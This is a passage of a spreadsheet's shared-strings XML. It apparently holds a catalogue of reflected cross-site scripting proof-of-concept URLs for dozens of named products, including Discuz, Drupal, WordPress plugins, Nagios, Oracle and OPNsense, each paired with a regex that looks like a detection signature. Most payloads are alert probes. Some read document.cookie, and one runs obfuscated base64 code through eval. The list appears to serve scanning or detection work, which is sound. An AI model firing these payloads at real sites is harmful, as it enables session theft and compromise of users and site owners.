    <t>/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E|/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E</t>
  </si>
  <si>
    <t>.*?(?:/email/unsubscribed\?email=test@gmail\.com%27\\%22%3E%3Csvg/onload=alert\(/xss/\)%3E).*</t>
  </si>
  <si>
    <t>/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E</t>
  </si>
  <si>
    <t>Discuz！</t>
  </si>
  <si>
    <t>Discuz！_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/uc_server/admin\.php\?m=user\&amp;a=login\&amp;iframe=\&amp;sid=%27%22%3E%3Cscript%3Ealert\(/asdfa/\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/uc_server/admin.php?m=user&amp;a=login&amp;iframe=&amp;sid=%27%22%3E%3Cscript%3Ealert(/asdfa/)%3C/script%3E</t>
  </si>
  <si>
    <t>.*?(?:/ajax\.php\?infloat=yes\&amp;handlekey=123\);alert\(/xss/\);//).*</t>
  </si>
  <si>
    <t>/ajax.php?infloat=yes&amp;handlekey=123);alert(/xss/);//</t>
  </si>
  <si>
    <t>.*?(?:/admincp\.php\?infloat=yes\&amp;handlekey=123\);alert\(/testvul/\);//).*</t>
  </si>
  <si>
    <t>/admincp.php?infloat=yes&amp;handlekey=123);alert(/testvul/);//</t>
  </si>
  <si>
    <t>Dlink Dsr</t>
  </si>
  <si>
    <t>Dlink Dsr_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/sCGI\-bin/platform\.CGI\?page=portalLogin\.htm\&amp;portal=SSLVPN"&gt;&lt;script&gt;alert\("netgear_dlink_xss"\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/sCGI-bin/platform.CGI?page=portalLogin.htm&amp;portal=SSLVPN"&gt;&lt;script&gt;alert("netgear_dlink_xss")&lt;/script&gt;</t>
  </si>
  <si>
    <t>Drupal 头像上传器</t>
  </si>
  <si>
    <t>Drupal 头像上传器_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/avatar_uploader\.pages\.inc\?file=%3Cscript%3Ealert\(document\.domain\)%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Easy Social Feed</t>
  </si>
  <si>
    <t>Easy Social Feed_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=easy\-facebook\-likebox\&amp;access_token=a\&amp;type=&lt;/script&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=easy-facebook-likebox&amp;access_token=a&amp;type=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Ep Web Solutions CMS</t>
  </si>
  <si>
    <t>Ep Web Solutions CMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/shop\.php\?search=%22/%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Flatpress</t>
  </si>
  <si>
    <t>Flatpress_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/admin\.php\?p=static\&amp;action=write\&amp;page=%22onfocus%3d%22alert%28document\.cookie%29%22autofocus%3d%22).*</t>
  </si>
  <si>
    <t>/admin.php?p=static&amp;action=write&amp;page=%22onfocus%3d%22alert%28document.cookie%29%22autofocus%3d%22</t>
  </si>
  <si>
    <t>Fronsetia</t>
  </si>
  <si>
    <t>Fronsetia_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/show_operations\.jsp\?Fronsetia_WSDL=%22%3E%3Cimg%2Bsrc%3Dx%20onerror%3Dalert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg%2Bsrc%3Dx%20onerror%3Dalert(document.domain)%3E</t>
  </si>
  <si>
    <t>Froxlor 服务器管理</t>
  </si>
  <si>
    <t>Froxlor 服务器管理_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/javascript%26colon%3Balert\(document\.domain\);dd%26sol%3b%26sol%3b).*</t>
  </si>
  <si>
    <t>/index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b</t>
  </si>
  <si>
    <t>Geovision Geowebserver</t>
  </si>
  <si>
    <t>Geovision Geowebserver_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/Visitor/bin/WebStrings\.srf\?file=\&amp;obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>Global Domains International</t>
  </si>
  <si>
    <t>Global Domains International_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/index\.dhtml\?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>GnubOArd_CMS</t>
  </si>
  <si>
    <t>GnubOArd_CMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/plugin/sms5/ajax\.sms_emoticon\.php\?arr_ajax_msg=gnuboard&lt;svg\+onload=alert\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard&lt;svg+onload=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>.*?(?:/mobile/shop/lg/mispwapurl\.php\?LGD_OID=%3Cscript%3Ealert\(document\.domain\)%3C/script%3E|/bbs/new\.php\?darkmode=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E|/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Gz Forum 脚本</t>
  </si>
  <si>
    <t>Gz Forum 脚本_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:preview\.php\?controller=Load\&amp;action=index\&amp;catid=moztj%22%3E%3Cscript%3Ealert\(document\.domain\)%3C%2fscript%3Ems3ea\&amp;down_up=a|/preview\.php\?controller=Load\&amp;action=index\&amp;catid=moztj%22%3E%3Cscript%3Ealert\(document\.domain\)%3C%2fscript%3Ems3ea\&amp;down_up=a).*</t>
  </si>
  <si>
    <t>preview.php?controller=Load&amp;action=index&amp;catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&amp;down_up=a|/preview.php?controller=Load&amp;action=index&amp;catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&amp;down_up=a</t>
  </si>
  <si>
    <t>Httpbin</t>
  </si>
  <si>
    <t>Httpbin_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ\+|/response\-headers\?Content\-Type=text/html\&amp;Server=%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+|/response-headers?Content-Type=text/html&amp;Server=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Ibm Eclipse 帮助系统</t>
  </si>
  <si>
    <t>Ibm Eclipse 帮助系统_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/help/index\.jsp\?view=%3Cscript%3Ealert\(document\.cookie\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E</t>
  </si>
  <si>
    <t>.*?(?:/iproperty/property\-views/all\-properties\-with\-map\?filter_keyword=pihil%22onmouseover=%22alert\(document\.domain\)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4\&amp;option=com_iproperty\&amp;view=allproperties\&amp;ipquicksearch=1).*</t>
  </si>
  <si>
    <t>/iproperty/property-views/all-properties-with-map?filter_keyword=pihil%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4&amp;option=com_iproperty&amp;view=allproperties&amp;ipquicksearch=1</t>
  </si>
  <si>
    <t>.*?(?:/\?review_id=1\&amp;itwed%22onmouseover=%22confirm\(document\.domain\)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1).*</t>
  </si>
  <si>
    <t>/?review_id=1&amp;itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jvouchers\&amp;controller=catalog\-results\&amp;task=query\&amp;wajx=1\&amp;wmjx=1\&amp;tmpl=component\&amp;type=raw\&amp;crtyid=12\&amp;trucs\[x\]\[search\]=gx3vt%20onfocus=alert\(document\.domain\)%20autofocus=%20itkrzsug7w5).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jvouchers&amp;controller=catalog-results&amp;task=query&amp;wajx=1&amp;wmjx=1&amp;tmpl=component&amp;type=raw&amp;crtyid=12&amp;trucs[x][search]=gx3vt%20onfocus=alert(document.domain)%20autofocus=%20itkrzsug7w5</t>
  </si>
  <si>
    <t>.*?(?:/for\-jobseekers/search\-jobs\?keyword=l9x1q%22onfocus%3D%22alert\(document\.domain\)%22autofocus%3D%22ak5aghi5u9p).*</t>
  </si>
  <si>
    <t>/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3D%22alert(document.domain)%22autofocus%3D%22ak5aghi5u9p</t>
  </si>
  <si>
    <t>.*?(?:/modules/mod_jvtwitter/jvtwitter\.php\?id=%22%3E%3Cimg%20src=x%20onerror=prompt\(document\.domain\);%3E).*</t>
  </si>
  <si>
    <t>/modules/mod_jvtwitter/jvtwitter.php?id=|/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E</t>
  </si>
  <si>
    <t>.*?(?:/\?option=com_oscommerce\&amp;osMod=mshop_pl_src\&amp;manufacturers_id=7\&amp;sort=products_sort_order\&amp;page=index\.php\&amp;format=xml\&amp;task=showproducts\&amp;view=med\&amp;sort=latest\&amp;sortdir=descgt5po%3Cimg%20src=a%20onerror=alert\(document\.domain\)%3Evh217).*</t>
  </si>
  <si>
    <t>/?option=com_oscommerce&amp;osMod=mshop_pl_src&amp;manufacturers_id=7&amp;sort=products_sort_order&amp;page=index.php&amp;format=xml&amp;task=showproducts&amp;view=med&amp;sort=latest&amp;sortdir=descgt5po%3Cimg%20src=a%20onerror=alert(document.domain)%3Evh217</t>
  </si>
  <si>
    <t>.*?(?:/joomla/greenery_hub/index\.php/en/hotels/reservations\?location=d2tff\&amp;task=hub\.search\&amp;ordering=score\&amp;direction=desc\&amp;type_id=0\&amp;show=db8ck%22onfocus=%22confirm\(document\.domain\)%22autofocus=%22xwu0k).*</t>
  </si>
  <si>
    <t>/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&amp;task=hub.search&amp;ordering=score&amp;direction=desc&amp;type_id=0&amp;show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k</t>
  </si>
  <si>
    <t>Kaue</t>
  </si>
  <si>
    <t>Kaue_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/login/\?service=tenant:;;9503%22\(\);\}\]&lt;/script&gt;&lt;img%20src=x%20onerror=alert\(document\.cookie\)&gt;\{\{7\*7\}\}9310\&amp;redirectTo=%2Ftenant%2F%3B%253B9503%2522%2528%2529%253B%257D%255D9310).*</t>
  </si>
  <si>
    <t>/login/?service=tenant:;;9503%22();}]&lt;/script&gt;&lt;img%20src=x%20onerror=alert(document.cookie)&gt;{{7*7}}9310&amp;redirectTo=%2Ftenant%2F%3B%253B9503%2522%2528%2529%253B%257D%255D9310</t>
  </si>
  <si>
    <t>vmware_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>KhodrochiCMS</t>
  </si>
  <si>
    <t>KhodrochiCMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/specification/report\.php\?q=%22%3E%3Cimg%20src=x%20onerror=prompt\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E</t>
  </si>
  <si>
    <t>.*?(?:/_ignition/scripts/\-\-&gt;&lt;svg%20onload=alert\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>/_ignition/scripts/--&gt;&lt;svg%20onload=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=LDAP\+authentication\+intergrating\+with\+AD\&amp;a"&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=LDAP+authentication+intergrating+with+AD&amp;a"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Mamp 服务器</t>
  </si>
  <si>
    <t>Mamp 服务器_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/test"%20onmouseover="alert\(document\.domain\);"%20style="font\-size:100000px;background\-color:white";).*</t>
  </si>
  <si>
    <t>/index.php/test"%20onmouseover="alert(document.domain);"%20style="font-size:100000px;background-color:white";</t>
  </si>
  <si>
    <t>My Calendar</t>
  </si>
  <si>
    <t>My Calendar_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/\?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm\(%2F\{\{randstr\}\}%2F\)%3E).*</t>
  </si>
  <si>
    <t>/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E</t>
  </si>
  <si>
    <t>Nagios Xi</t>
  </si>
  <si>
    <t>Nagios Xi_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/nagioslogserver/includes/components/ccm/\?cmd=modify\&amp;id=1\&amp;page=1\&amp;returnUrl=%22%3C/script%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E\&amp;type=host|/nagioslogserver/login).*</t>
  </si>
  <si>
    <t>/nagioslogserver/includes/components/ccm/?cmd=modify&amp;id=1&amp;page=1&amp;returnUrl=%22%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&amp;type=host|/nagioslogserver/login</t>
  </si>
  <si>
    <t>Netsweeper_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/webadmin/reporter/view_server_log\.php\?server=localhost\&amp;act=stats\&amp;filename=\&amp;offset=1\&amp;count=1000\&amp;sortorder=\&amp;log=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;offset=\&amp;sortitem=\&amp;filter=).*</t>
  </si>
  <si>
    <t>/webadmin/reporter/view_server_log.php?server=localhost&amp;act=stats&amp;filename=&amp;offset=1&amp;count=1000&amp;sortorder=&amp;log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;offset=&amp;sortitem=&amp;filter=</t>
  </si>
  <si>
    <t>News Script Pro</t>
  </si>
  <si>
    <t>News Script Pro_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/preview\.php/mn71q%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3Ep15vr\?cat_id=\&amp;p=2).*</t>
  </si>
  <si>
    <t>/preview.php/mn71q%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ep15vr?cat_id=&amp;p=2</t>
  </si>
  <si>
    <t>Nginx_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/status%3E%3Cscript%3Ealert\(31337\)%3C%2Fscript%3E|/_404_%3E%3Cscript%3Ealert\(1337\)%3C%2Fscript%3E|/status%3E%3Cscript%3Ealert\(7331\)%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E|/_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E|/status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Office Suite Premium</t>
  </si>
  <si>
    <t>Office Suite Premium_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/api\?path=files\&amp;id=dfsse%3Cimg%20src%3da%20onerror%3dalert\(document\.domain\)%3Ez1668cyj2pi\&amp;revision=%22%22\&amp;type=%22thumb%22\&amp;command=url\&amp;expires=1687785968527).*</t>
  </si>
  <si>
    <t>/api?path=files&amp;id=dfsse%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ez1668cyj2pi&amp;revision=%22%22&amp;type=%22thumb%22&amp;command=url&amp;expires=1687785968527</t>
  </si>
  <si>
    <t>Onlyoffice 办公系统</t>
  </si>
  <si>
    <t>Onlyoffice 办公系统_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/Products/Files/HttpHandlers/filehandler\.ashx\?action=thumb\&amp;fileid=%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/Products/Files/HttpHandlers/filehandler.ashx?action=thumb&amp;fileid=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Open Akamai Arl</t>
  </si>
  <si>
    <t>Open Akamai Arl_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/7/0/33/1d/www\.citysearch\.com/search\?what=x\&amp;where=place%22%3E%3Csvg\+onload=confirm\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/7/0/33/1d/www.citysearch.com/search?what=x&amp;where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E</t>
  </si>
  <si>
    <t>Opnsense</t>
  </si>
  <si>
    <t>Opnsense_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/system_certmanager\.php\?act=%22%3E%3Csvg/onload=eval\(atob\(%27bGV0IHJlcXVlc3REYXRh\[\.\.\.\]HsKCQl9KQoJfSkKfSwgMTAwMCk=%27\)\)%3E\&amp;id=0).*</t>
  </si>
  <si>
    <t>/system_certmanager.php?act=%22%3E%3Csvg/onload=eval(atob(%27bGV0IHJlcXVlc3REYXRh[...]HsKCQl9KQoJfSkKfSwgMTAwMCk=%27))%3E&amp;id=0</t>
  </si>
  <si>
    <t>Oracle OAm</t>
  </si>
  <si>
    <t>Oracle OAm_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/oam/pages/error\.jsp\?error=javascript%3A%2F%2Axssx%27%22%3E\-\-%3E%3C%2Fnoscript%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fstyle%3E%3C%2Ftemplate%3E%3C%2Fnoembed%3E%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%2F%2F%3E%2A%2F%3Btop\.alert%282%29%2F%2F).*</t>
  </si>
  <si>
    <t>/oam/pages/error.jsp?error=javascript%3A%2F%2Axssx%27%22%3E--%3E%3C%2Fnoscript%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fstyle%3E%3C%2Ftemplate%3E%3C%2Fnoembed%3E%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%2F%2F%3E%2A%2F%3Btop.alert%282%29%2F%2F</t>
  </si>
  <si>
    <t>Oracle Siebel Loyalty</t>
  </si>
  <si>
    <t>Oracle Siebel Loyalty_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/loyalty_enu/start\.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Oracle 电子商务套件</t>
  </si>
  <si>
    <t>Oracle 电子商务套件_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/OA_HTML/ieuiMeetingErrorDisplay\.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert\('\{\{randstr\}\}'\)%3E|/OA_HTML/jtfLOVInProcess\.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert\('\{\{randstr\}\}'\)%3E|/OA_HTML/oksAutoRenewalHelp\.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert\('\{\{randstr\}\}'\)%3E).*</t>
  </si>
  <si>
    <t>/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E|/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E|/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E</t>
  </si>
  <si>
    <t>Parallels H Sphere</t>
  </si>
  <si>
    <t>Parallels H Sphere_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/webshell4/login\.php\?err=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E|/webshell4/login\.php\?login=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E|/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Parallels H</t>
  </si>
  <si>
    <t>Parallels H_跨站脚本</t>
  </si>
  <si>
    <t>Photo Gallery_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/plugins\.php\?%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/plugins.php?%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Php Timeclock</t>
  </si>
  <si>
    <t>Php Timeclock_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/login\.php/'%3E%3Csvg/onload=alert%60\{\{randstr\}\}%60%3E).*</t>
  </si>
  <si>
    <t>/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E</t>
  </si>
  <si>
    <t>Phuket Solution CMS</t>
  </si>
  <si>
    <t>Phuket Solution CMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/properties\-list\.php\?property\-types=1\&amp;types=2\&amp;location=\&amp;prices=\&amp;bedroom=\&amp;code=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>Print Lite 插件反射型</t>
  </si>
  <si>
    <t>Print Lite 插件反射型_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=p3dlite_materials\&amp;material_text="&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=p3dlite_materials&amp;material_text="&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/assets/php/_devtools/installer/step_2\.php\?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E|/qcubed/assets/php/_devtools/installer/step_2\.php\?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E|/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Readymade Unilevel 电商 Mlm</t>
  </si>
  <si>
    <t>Readymade Unilevel 电商 Mlm_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/product\-details\.php\?id=1"&gt;&lt;img/src/onerror=\.1|alert`\{\{num1\}\}`\+class=\{\{num1\}\}&gt;).*</t>
  </si>
  <si>
    <t>Reality Estate多功能Wp主题</t>
  </si>
  <si>
    <t>Reality Estate多功能Wp主题_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/properties\-with\-map/\?status\&amp;keyword=%22%3E%3Cimg%20src=x%20onerror=\(alert\)\(document\.domain\);//%22).*</t>
  </si>
  <si>
    <t>/properties-with-map/?status&amp;keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(document.domain);//%22</t>
  </si>
  <si>
    <t>Reddit Top Rss</t>
  </si>
  <si>
    <t>Reddit Top Rss_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/\?subreddit=news\&amp;score=2134%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/?subreddit=news&amp;score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Rentequip Multipurpose Rental</t>
  </si>
  <si>
    <t>Rentequip Multipurpose Rental_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/shop/products\?category=cordless\-tools\&amp;min=1026553%3balert\(document\.domain\)%2f%2f772).*</t>
  </si>
  <si>
    <t>Sassy Social Share</t>
  </si>
  <si>
    <t>Sassy Social Share_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?action=heateor_sss_sharing_count\&amp;urls\[%3Cimg%20src%3dx%20onerror%3dalert\(document\.domain\)%3E\]=).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&amp;urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=</t>
  </si>
  <si>
    <t>Senayan Library Management System (Slims )</t>
  </si>
  <si>
    <t>Senayan Library Management System (Slims )_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84\&amp;destination=zbuip%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl\&amp;logMeIn=Login\&amp;memberID=admin\&amp;memberPassWord=password\&amp;p=member).*</t>
  </si>
  <si>
    <t>Senayan 图书馆管理系统 Akasia</t>
  </si>
  <si>
    <t>Senayan 图书馆管理系统 Akasia_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/perpustakaan/slims/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/perpus/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/digilib/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/library/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/perpustakaan/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/slims/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/e\-library/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member|/akasia/index\.php\?destination=%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E\&amp;p=member).*</t>
  </si>
  <si>
    <t>/perpustakaan/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/perpus/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/digilib/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/perpustakaan/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/e-library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member|/akasia/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;p=member</t>
  </si>
  <si>
    <t>Senayan 图书馆管理系统 Bulian</t>
  </si>
  <si>
    <t>Senayan 图书馆管理系统 Bulian_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/perpustakaan/index\.php/%22\-\-%3E&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;/index\.php).*</t>
  </si>
  <si>
